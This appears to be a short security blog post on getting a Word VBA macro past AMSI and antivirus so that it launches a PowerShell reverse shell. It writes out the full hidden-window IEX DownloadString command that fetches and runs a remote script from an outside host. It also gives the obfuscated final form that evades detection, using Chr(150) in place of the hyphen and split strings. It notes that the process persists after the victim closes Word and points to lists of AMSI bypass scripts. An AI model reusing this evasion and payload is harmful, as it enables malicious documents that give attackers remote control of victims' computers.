I was reading various articles on how other go about bypassing AMSI using VBA. A great article can be found on this blog codewhitesec.
Instead of trying to replicate that I chose a different route. I tried using the powershell command Invoke-Experession to download Nikhil's reverse shell script.
In order to run powershell commands using VBA I have used the code published in Microsoft's Docs (here). The code is ideal for this project because it doesn't get flagged by the Antivirus or AMSI. It also spawns a seperate process. That's particularly helpful since our script won't terminate if the victim closes Word.
The command I wanted to run in this macro is the following:
Powershell.exe -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.246/1234567892222.ps1')This command was flagged by AMSI as malicious. After experimenting a bit with variations of this command i found out that the AMSI was flagging -WindowStyle as malicious. Splitting the string using conventional amsi bypassing techinques ("-W" + "indo" + "wStyle") was not effective. Instead I started replacing the '-' symbol with ascii character codes of the various "-" symbols. Finally Chr(150) did the trick and my reverse shell script was executed.
The final form of the powershell command was:
Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.246/1234567892222.ps1')"I have slightly modified Nikhil's script in order to avoid being detected by AMSI for powershell. Once connection is established an amsi bypass script can be used.Here is a list of AMSI bypass scripts that can be used by S3cur3Th1sSh1t